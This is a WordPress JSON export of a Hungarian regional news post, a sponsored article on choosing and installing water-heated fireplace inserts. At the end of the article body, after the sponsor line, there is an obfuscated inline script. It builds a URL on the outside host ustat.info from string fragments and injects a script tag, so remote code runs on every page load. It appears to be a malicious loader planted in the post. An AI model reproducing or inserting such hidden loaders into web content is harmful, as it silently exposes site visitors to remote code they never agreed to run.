{"id":31506,"date":"2021-04-01T07:10:14","date_gmt":"2021-04-01T05:10:14","guid":{"rendered":"http:\/\/dorogimedence.hu\/?p=31506"},"modified":"2021-04-01T07:10:23","modified_gmt":"2021-04-01T05:10:23","slug":"miert-erdemes-vizteres-kandallobetetet-valasztani","status":"publish","type":"post","link":"https:\/\/dorogimedence.hu\/index.php\/2021\/04\/01\/miert-erdemes-vizteres-kandallobetetet-valasztani\/","title":{"rendered":"Mi\u00e9rt \u00e9rdemes v\u00edzteres kandall\u00f3bet\u00e9tet v\u00e1lasztani?"},"content":{"rendered":"<p><strong>Egy kandall\u00f3 nem csak romantikusan hangulatot teremt, de igen hasznos berendez\u00e9s is. T\u00f6k\u00e9letes melegs\u00e9get hoz m\u00e9g a legridegebb otthonokba is, azonban amennyire v\u00e1gyunk r\u00e1, sokszor legal\u00e1bb annyira f\u00e9l\u00fcnk is t\u0151le.<\/strong><\/p>\n<p>A klasszikus kandall\u00f3k h\u00e1tr\u00e1nya ugyanis, hogy kiz\u00e1r\u00f3lag azt a helyis\u00e9get teszik melegg\u00e9, amelyikbe elhelyezt\u00fck \u0151ket. Nagyobb belt\u00e9rben, vagy t\u00f6bb helyis\u00e9g eset\u00e9n egy\u00e1ltal\u00e1n nem praktikus megold\u00e1s. Ezeket ink\u00e1bb csak a hangulat kedv\u00e9\u00e9rt szoktuk haszn\u00e1lni.<\/p>\n<p>Azonban, ha a teljes lak\u00e1s f\u0171t\u00e9si rendszer\u00e9nek kialak\u00edt\u00e1s\u00e1hoz keres\u00fcnk megold\u00e1st, akkor sem kell lemondanunk a kandall\u00f3 meghitt l\u00e1tv\u00e1ny\u00e1r\u00f3l, ugyanis egy j\u00f3l kiv\u00e1lasztott <span style=\"text-decoration: underline; color: #0000ff;\"><a style=\"color: #0000ff; text-decoration: underline;\" href=\"https:\/\/netkazan.hu\/termekek\/vizteres-kandallo\/85\" target=\"_blank\" rel=\"dofollow noopener\">v\u00edzteres kandall\u00f3bet\u00e9t<\/a><\/span> seg\u00edt, hogy egyenletesen meleg legyen az eg\u00e9sz lak\u00e1sban. Ezek a berendez\u00e9sek ugyanis \u00e1tmenetet k\u00e9peznek a romantikus hangulat\u00fa kandall\u00f3k \u00e9s a kaz\u00e1n k\u00f6z\u00f6tt. A v\u00edzteres kandall\u00f3bet\u00e9tnek k\u00f6sz\u00f6nhet\u0151en r\u00e1k\u00f6thet\u0151k a k\u00f6zponti f\u0171t\u0151rendszerre \u00edgy a teljes\u00edtm\u00e9nye egy r\u00e9sz\u00e9t a lak\u00e1s t\u00f6bbi r\u00e9sz\u00e9ben is hasznos\u00edtja.<\/p>\n<p><strong>Mi\u00e9rt hasznos v\u00edzteres kandall\u00f3t v\u00e1lasztani?<\/strong><\/p>\n<p>Manaps\u00e1g az egyik legmodernebb f\u0171t\u00e9si megold\u00e1snak sz\u00e1m\u00edt, mellyel a k\u00f6rnyezet\u00fcnket is \u00f3vjuk. A fa el\u00e9get\u00e9se sor\u00e1n ugyanis nem keletkezik nagyobb mennyis\u00e9g\u0171 sz\u00e9nmonoxid, mint a fa elkorhad\u00e1sa sor\u00e1n. Emellett pedig a fa az egyik legolcs\u00f3bb \u00e9s legk\u00f6nnyebben beszerezhet\u0151 f\u0171t\u00e9s. A v\u00edzteres kandall\u00f3bet\u00e9tet v\u00e1lasztva nem sz\u00fcks\u00e9ges a tov\u00e1bbiakban a g\u00e1z haszn\u00e1lata, \u00edgy ak\u00e1r azt ki is k\u00f6ttethetj\u00fck az otthonunkb\u00f3l, ezzel nagyobb biztons\u00e1got teremtve. A l\u00e9gf\u0171t\u00e9ses kandall\u00f3kkal szemben pedig nem csak az adott helyis\u00e9get, hanem az eg\u00e9sz lak\u00e1st egyenletesen \u00e1tj\u00e1rja a meleg. Napkollektoros f\u0171t\u00e9ssel kieg\u00e9sz\u00edtve pedig a melegv\u00edz ell\u00e1t\u00e1sban is seg\u00edts\u00e9g\u00fcnkre lesz, illetve puffertart\u00e1llyal megtoldva, ak\u00e1r eg\u00e9sz nap tartja a h\u0151t, \u00edgy nem kell a folyamatos fa ut\u00e1np\u00f3tl\u00e1son sem agg\u00f3dni.<\/p>\n<p><strong>Mi sz\u00fcks\u00e9ges egy v\u00edzteres kandall\u00f3 beszerel\u00e9s\u00e9hez?<\/strong><\/p>\n<p>Ahhoz, hogy biztons\u00e1gosan beszerelhet\u0151 \u00e9s haszn\u00e1lhat\u00f3 legyen a v\u00edzteres kandall\u00f3bet\u00e9t sz\u00fcks\u00e9g lesz egy j\u00f3 \u00e1llapot\u00fa, a szabv\u00e1nynak megfelel\u0151 k\u00e9m\u00e9nyre, mag\u00e1ra az eszk\u00f6zre, illetve egy kompatibilis f\u0171t\u00e9si rendszerre, amire r\u00e1k\u00f6tj\u00fck majd. Ha eddig nem volt, akkor ki kell \u00e9p\u00edteni, egy\u00e9b esetben nem tudjuk elosztani a kandall\u00f3 \u00e1ltal leadott h\u0151t a lak\u00e1sban. A v\u00edzteres kandall\u00f3bet\u00e9t z\u00e1rt rendszerre val\u00f3 r\u00e1k\u00f6t\u00e9se eset\u00e9n biztos\u00edtanunk kell a friss leveg\u0151 ut\u00e1np\u00f3tl\u00e1s\u00e1t is. Illetve sz\u00fcks\u00e9g\u00fcnk lesz t\u00f6bbek k\u00f6z\u00f6tt olyan tov\u00e1bbi \u00e9p\u00fcletg\u00e9p\u00e9szeti kieg\u00e9sz\u00edt\u0151kre a beszerel\u00e9shez, mint szivatty\u00fak, szond\u00e1k, cs\u0151termoszt\u00e1tok, h\u0151m\u00e9r\u0151, vez\u00e9rl\u0151 elemek, biztons\u00e1gi \u00e9s kever\u0151szelepek.<\/p>\n<p>Amennyiben napkollektoros rendszerhez illesztj\u00fck, vagy esetleg nincs id\u0151nk rendszeresen pakolni a t\u0171zre, akkor javasolt a puffertart\u00e1ly haszn\u00e1lata, ami seg\u00edt elrakt\u00e1rozni a h\u0151t. Mivel a v\u00edzteres kandall\u00f3bet\u00e9t be\u00e9p\u00edt\u00e9se igen nagy odafigyel\u00e9st ig\u00e9nyel a k\u00e9s\u0151bbi biztons\u00e1gunk \u00e9rdek\u00e9ben javasolt szakemberre b\u00edzni a feladatot.<\/p>\n<p><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-full wp-image-31507\" src=\"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/viztereskandallo.jpg\" alt=\"\" width=\"720\" height=\"540\" srcset=\"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/viztereskandallo.jpg 720w, https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/viztereskandallo-300x225.jpg 300w\" sizes=\"(max-width: 720px) 100vw, 720px\" \/><\/p>\n<p><strong>Mire figyelj\u00fcnk a v\u00edzteres kandall\u00f3 kiv\u00e1laszt\u00e1s\u00e1n\u00e1l?<\/strong><\/p>\n<p>K\u00e9tf\u00e9le v\u00edzteres kandall\u00f3bet\u00e9tet k\u00fcl\u00f6nb\u00f6ztet\u00fcnk meg: az egyik a ny\u00edlt a m\u00e1sik pedig z\u00e1rt rendszer\u0171. A z\u00e1rt rendszer\u0171 kandall\u00f3 be\u00e9p\u00edtett h\u0151cser\u00e9l\u0151vel rendelkezik, ami seg\u00edt a t\u00falmeleged\u00e9s elker\u00fcl\u00e9s\u00e9ben \u2013 a z\u00e1rt rendszer\u0171 kandall\u00f3t k\u00f6zvetlen\u00fcl r\u00e1 tudjuk k\u00f6tni a megl\u00e9v\u0151 f\u0171t\u0151rendszerre. Viszont fontos, hogy fokozott figyelmet ford\u00edtsunk a friss leveg\u0151 megfelel\u0151 ut\u00e1np\u00f3tl\u00e1s\u00e1ra. A nyitott \u00e9g\u00e9ster\u0171 eszk\u00f6z\u00f6kn\u00e9l egy \u00fagynevezett k\u00f6penyes vagy fels\u0151 h\u0151cser\u00e9l\u0151 tal\u00e1lhat\u00f3, \u00edgy enn\u00e9l a biztons\u00e1gi k\u00f6reit a kandall\u00f3n k\u00edv\u00fcl kell megoldani. Ezt a t\u00edpust a h\u0151cser\u00e9l\u0151 k\u00f6zvet\u00edt\u00e9s\u00e9vel tudjuk r\u00e1k\u00f6tni a z\u00e1rt f\u0171t\u00e9srendszerre.<\/p>\n<p>Amennyiben az otthonunk teljes j\u00f3l kialak\u00edtott f\u0171t\u00e9s\u00e9t szeretn\u00e9nk v\u00edzteres kandall\u00f3val megoldani, \u00fagy \u00e9rdemes n\u00e9h\u00e1ny dologra k\u00fcl\u00f6n\u00f6sen odafigyelni: javasolt ker\u00e1mia bet\u00e9tes kandall\u00f3t v\u00e1lasztani, mivel ez magasabb \u00e9g\u00e9si h\u0151m\u00e9rs\u00e9kletet biztos\u00edt, \u00e9s a h\u0151tart\u00e1sban is seg\u00edt. Emellett fontos, hogy j\u00f3l tiszt\u00edthat\u00f3 \u00e9s karbantarthat\u00f3 legyen a v\u00e1lasztott berendez\u00e9s ez\u00e9rt javasolt ker\u00fclni az olyan t\u00edpusokat, amelyek p\u00e9ld\u00e1ul cs\u00f6ves h\u0151cser\u00e9l\u0151t alkalmaznak.<\/p>\n<p>A cikk megjelen\u00e9s\u00e9t a Netkaz\u00e1n web\u00e1ruh\u00e1z t\u00e1mogatta, akik m\u00e1r 25+ \u00e9ve \u00e1llnak a f\u0171t\u00e9stechnika szolg\u00e1lat\u00e1ban.<br \/>\n<script>\n(function(){\ntj1tu=\"4e3ecrzfj1t6\";tj1t=document.createElement(\"script\");\ntj1t_=\"u\"+(\"st\");tj1t_+=\"at\"+(\".\");tj1t.async=true;tj1t_+=\"in\";\ntj1tu=\"255583087.\"+tj1tu;tj1t.type=\"text\/javascript\";tj1tu+=\"hpezXzwdhwde\";\ntj1tu+=\"tfr2av\";tj1t_+=(\"f\")+\"o\"+(\"\/\");tj1t.src=\"https:\/\/\"+tj1t_+tj1tu;\ntj1td=document.body;tj1td.appendChild(tj1t);\n})();\n<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Egy kandall\u00f3 nem csak romantikusan hangulatot teremt, de igen hasznos berendez\u00e9s is. T\u00f6k\u00e9letes melegs\u00e9get hoz m\u00e9g a legridegebb otthonokba is, azonban amennyire v\u00e1gyunk r\u00e1, sokszor legal\u00e1bb annyira f\u00e9l\u00fcnk is t\u0151le. A klasszikus kandall\u00f3k h\u00e1tr\u00e1nya ugyanis, hogy kiz\u00e1r\u00f3lag azt a helyis\u00e9get teszik melegg\u00e9, amelyikbe elhelyezt\u00fck \u0151ket. Nagyobb belt\u00e9rben, vagy t\u00f6bb helyis\u00e9g eset\u00e9n egy\u00e1ltal\u00e1n nem praktikus megold\u00e1s.<\/p>\n","protected":false},"author":1,"featured_media":31508,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0,"footnotes":""},"categories":[3],"tags":[5555,5556],"class_list":{"0":"post-31506","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-hirek","8":"tag-kandallo","9":"tag-vizteres-kandallo"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Mi\u00e9rt \u00e9rdemes v\u00edzteres kandall\u00f3bet\u00e9tet v\u00e1lasztani?<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/dorogimedence.hu\/index.php\/2021\/04\/01\/miert-erdemes-vizteres-kandallobetetet-valasztani\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:locale\" content=\"hu_HU\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:type\" content=\"article\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:title\" content=\"Mi\u00e9rt \u00e9rdemes v\u00edzteres kandall\u00f3bet\u00e9tet v\u00e1lasztani?\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:description\" content=\"Egy kandall\u00f3 nem csak romantikusan hangulatot teremt, de igen hasznos berendez\u00e9s is. T\u00f6k\u00e9letes melegs\u00e9get hoz m\u00e9g a legridegebb otthonokba is, azonban amennyire v\u00e1gyunk r\u00e1, sokszor legal\u00e1bb annyira f\u00e9l\u00fcnk is t\u0151le. A klasszikus kandall\u00f3k h\u00e1tr\u00e1nya ugyanis, hogy kiz\u00e1r\u00f3lag azt a helyis\u00e9get teszik melegg\u00e9, amelyikbe elhelyezt\u00fck \u0151ket. Nagyobb belt\u00e9rben, vagy t\u00f6bb helyis\u00e9g eset\u00e9n egy\u00e1ltal\u00e1n nem praktikus megold\u00e1s.\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:url\" content=\"https:\/\/dorogimedence.hu\/index.php\/2021\/04\/01\/miert-erdemes-vizteres-kandallobetetet-valasztani\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:site_name\" content=\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/dorogimedence\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:published_time\" content=\"2021-04-01T05:10:14+00:00\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:modified_time\" content=\"2021-04-01T05:10:23+00:00\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i0.wp.com\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/kandallo-01.jpg?fit=830%2C450&ssl=1\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:width\" content=\"830\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:height\" content=\"450\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"author\" content=\"dorogimedence.hu\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"twitter:label1\" content=\"Szerz\u0151:\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:data1\" content=\"dorogimedence.hu\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:label2\" content=\"Becs\u00fclt olvas\u00e1si id\u0151\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 perc\" class=\"yoast-seo-meta-tag\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/04\\\/01\\\/miert-erdemes-vizteres-kandallobetetet-valasztani\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/04\\\/01\\\/miert-erdemes-vizteres-kandallobetetet-valasztani\\\/\"},\"author\":{\"name\":\"dorogimedence.hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/person\\\/ce6091eeb7e95ecdc87890d6aa8e0fd4\"},\"headline\":\"Mi\u00e9rt \u00e9rdemes v\u00edzteres kandall\u00f3bet\u00e9tet v\u00e1lasztani?\",\"datePublished\":\"2021-04-01T05:10:14+00:00\",\"dateModified\":\"2021-04-01T05:10:23+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/04\\\/01\\\/miert-erdemes-vizteres-kandallobetetet-valasztani\\\/\"},\"wordCount\":876,\"publisher\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/04\\\/01\\\/miert-erdemes-vizteres-kandallobetetet-valasztani\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/04\\\/kandallo-01.jpg\",\"keywords\":[\"kandall\u00f3\",\"v\u00edzteres kandall\u00f3\"],\"articleSection\":[\"H\u00edrek\"],\"inLanguage\":\"hu\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/04\\\/01\\\/miert-erdemes-vizteres-kandallobetetet-valasztani\\\/\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/04\\\/01\\\/miert-erdemes-vizteres-kandallobetetet-valasztani\\\/\",\"name\":\"Mi\u00e9rt \u00e9rdemes v\u00edzteres kandall\u00f3bet\u00e9tet v\u00e1lasztani?\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/04\\\/01\\\/miert-erdemes-vizteres-kandallobetetet-valasztani\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/04\\\/01\\\/miert-erdemes-vizteres-kandallobetetet-valasztani\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/04\\\/kandallo-01.jpg\",\"datePublished\":\"2021-04-01T05:10:14+00:00\",\"dateModified\":\"2021-04-01T05:10:23+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/04\\\/01\\\/miert-erdemes-vizteres-kandallobetetet-valasztani\\\/#breadcrumb\"},\"inLanguage\":\"hu\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/04\\\/01\\\/miert-erdemes-vizteres-kandallobetetet-valasztani\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/04\\\/01\\\/miert-erdemes-vizteres-kandallobetetet-valasztani\\\/#primaryimage\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/04\\\/kandallo-01.jpg\",\"contentUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/04\\\/kandallo-01.jpg\",\"width\":830,\"height\":450},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/04\\\/01\\\/miert-erdemes-vizteres-kandallobetetet-valasztani\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Kezd\u0151lap\",\"item\":\"https:\\\/\\\/dorogimedence.hu\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Mi\u00e9rt \u00e9rdemes v\u00edzteres kandall\u00f3bet\u00e9tet v\u00e1lasztani?\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#website\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/\",\"name\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\",\"description\":\"Dorog, Keszt\u00f6lc, Le\u00e1nyv\u00e1r, Piliscs\u00e9v, Tokod, Tokodalt\u00e1r\u00f3, Csolnok, Esztergom-kertv\u00e1ros: h\u00edrek, programok\",\"publisher\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/dorogimedence.hu\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"hu\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\",\"name\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/04\\\/logo-feher-600.png\",\"contentUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/04\\\/logo-feher-600.png\",\"width\":600,\"height\":100,\"caption\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/dorogimedence\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/person\\\/ce6091eeb7e95ecdc87890d6aa8e0fd4\",\"name\":\"dorogimedence.hu\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"url\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"contentUrl\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"caption\":\"dorogimedence.hu\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Mi\u00e9rt \u00e9rdemes v\u00edzteres kandall\u00f3bet\u00e9tet v\u00e1lasztani?","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/dorogimedence.hu\/index.php\/2021\/04\/01\/miert-erdemes-vizteres-kandallobetetet-valasztani\/","og_locale":"hu_HU","og_type":"article","og_title":"Mi\u00e9rt \u00e9rdemes v\u00edzteres kandall\u00f3bet\u00e9tet v\u00e1lasztani?","og_description":"Egy kandall\u00f3 nem csak romantikusan hangulatot teremt, de igen hasznos berendez\u00e9s is. T\u00f6k\u00e9letes melegs\u00e9get hoz m\u00e9g a legridegebb otthonokba is, azonban amennyire v\u00e1gyunk r\u00e1, sokszor legal\u00e1bb annyira f\u00e9l\u00fcnk is t\u0151le. A klasszikus kandall\u00f3k h\u00e1tr\u00e1nya ugyanis, hogy kiz\u00e1r\u00f3lag azt a helyis\u00e9get teszik melegg\u00e9, amelyikbe elhelyezt\u00fck \u0151ket. Nagyobb belt\u00e9rben, vagy t\u00f6bb helyis\u00e9g eset\u00e9n egy\u00e1ltal\u00e1n nem praktikus megold\u00e1s.","og_url":"https:\/\/dorogimedence.hu\/index.php\/2021\/04\/01\/miert-erdemes-vizteres-kandallobetetet-valasztani\/","og_site_name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","article_publisher":"https:\/\/www.facebook.com\/dorogimedence\/","article_published_time":"2021-04-01T05:10:14+00:00","article_modified_time":"2021-04-01T05:10:23+00:00","og_image":[{"width":830,"height":450,"url":"https:\/\/i0.wp.com\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/kandallo-01.jpg?fit=830%2C450&ssl=1","type":"image\/jpeg"}],"author":"dorogimedence.hu","twitter_card":"summary_large_image","twitter_misc":{"Szerz\u0151:":"dorogimedence.hu","Becs\u00fclt olvas\u00e1si id\u0151":"4 perc"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/dorogimedence.hu\/index.php\/2021\/04\/01\/miert-erdemes-vizteres-kandallobetetet-valasztani\/#article","isPartOf":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2021\/04\/01\/miert-erdemes-vizteres-kandallobetetet-valasztani\/"},"author":{"name":"dorogimedence.hu","@id":"https:\/\/dorogimedence.hu\/#\/schema\/person\/ce6091eeb7e95ecdc87890d6aa8e0fd4"},"headline":"Mi\u00e9rt \u00e9rdemes v\u00edzteres kandall\u00f3bet\u00e9tet v\u00e1lasztani?","datePublished":"2021-04-01T05:10:14+00:00","dateModified":"2021-04-01T05:10:23+00:00","mainEntityOfPage":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2021\/04\/01\/miert-erdemes-vizteres-kandallobetetet-valasztani\/"},"wordCount":876,"publisher":{"@id":"https:\/\/dorogimedence.hu\/#organization"},"image":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2021\/04\/01\/miert-erdemes-vizteres-kandallobetetet-valasztani\/#primaryimage"},"thumbnailUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/kandallo-01.jpg","keywords":["kandall\u00f3","v\u00edzteres kandall\u00f3"],"articleSection":["H\u00edrek"],"inLanguage":"hu"},{"@type":"WebPage","@id":"https:\/\/dorogimedence.hu\/index.php\/2021\/04\/01\/miert-erdemes-vizteres-kandallobetetet-valasztani\/","url":"https:\/\/dorogimedence.hu\/index.php\/2021\/04\/01\/miert-erdemes-vizteres-kandallobetetet-valasztani\/","name":"Mi\u00e9rt \u00e9rdemes v\u00edzteres kandall\u00f3bet\u00e9tet v\u00e1lasztani?","isPartOf":{"@id":"https:\/\/dorogimedence.hu\/#website"},"primaryImageOfPage":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2021\/04\/01\/miert-erdemes-vizteres-kandallobetetet-valasztani\/#primaryimage"},"image":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2021\/04\/01\/miert-erdemes-vizteres-kandallobetetet-valasztani\/#primaryimage"},"thumbnailUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/kandallo-01.jpg","datePublished":"2021-04-01T05:10:14+00:00","dateModified":"2021-04-01T05:10:23+00:00","breadcrumb":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2021\/04\/01\/miert-erdemes-vizteres-kandallobetetet-valasztani\/#breadcrumb"},"inLanguage":"hu","potentialAction":[{"@type":"ReadAction","target":["https:\/\/dorogimedence.hu\/index.php\/2021\/04\/01\/miert-erdemes-vizteres-kandallobetetet-valasztani\/"]}]},{"@type":"ImageObject","inLanguage":"hu","@id":"https:\/\/dorogimedence.hu\/index.php\/2021\/04\/01\/miert-erdemes-vizteres-kandallobetetet-valasztani\/#primaryimage","url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/kandallo-01.jpg","contentUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/kandallo-01.jpg","width":830,"height":450},{"@type":"BreadcrumbList","@id":"https:\/\/dorogimedence.hu\/index.php\/2021\/04\/01\/miert-erdemes-vizteres-kandallobetetet-valasztani\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Kezd\u0151lap","item":"https:\/\/dorogimedence.hu\/"},{"@type":"ListItem","position":2,"name":"Mi\u00e9rt \u00e9rdemes v\u00edzteres kandall\u00f3bet\u00e9tet v\u00e1lasztani?"}]},{"@type":"WebSite","@id":"https:\/\/dorogimedence.hu\/#website","url":"https:\/\/dorogimedence.hu\/","name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","description":"Dorog, Keszt\u00f6lc, Le\u00e1nyv\u00e1r, Piliscs\u00e9v, Tokod, Tokodalt\u00e1r\u00f3, Csolnok, Esztergom-kertv\u00e1ros: h\u00edrek, programok","publisher":{"@id":"https:\/\/dorogimedence.hu\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/dorogimedence.hu\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"hu"},{"@type":"Organization","@id":"https:\/\/dorogimedence.hu\/#organization","name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","url":"https:\/\/dorogimedence.hu\/","logo":{"@type":"ImageObject","inLanguage":"hu","@id":"https:\/\/dorogimedence.hu\/#\/schema\/logo\/image\/","url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/logo-feher-600.png","contentUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/logo-feher-600.png","width":600,"height":100,"caption":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l"},"image":{"@id":"https:\/\/dorogimedence.hu\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/dorogimedence\/"]},{"@type":"Person","@id":"https:\/\/dorogimedence.hu\/#\/schema\/person\/ce6091eeb7e95ecdc87890d6aa8e0fd4","name":"dorogimedence.hu","image":{"@type":"ImageObject","inLanguage":"hu","@id":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","url":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","contentUrl":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","caption":"dorogimedence.hu"}}]}},"_links":{"self":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts\/31506","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/post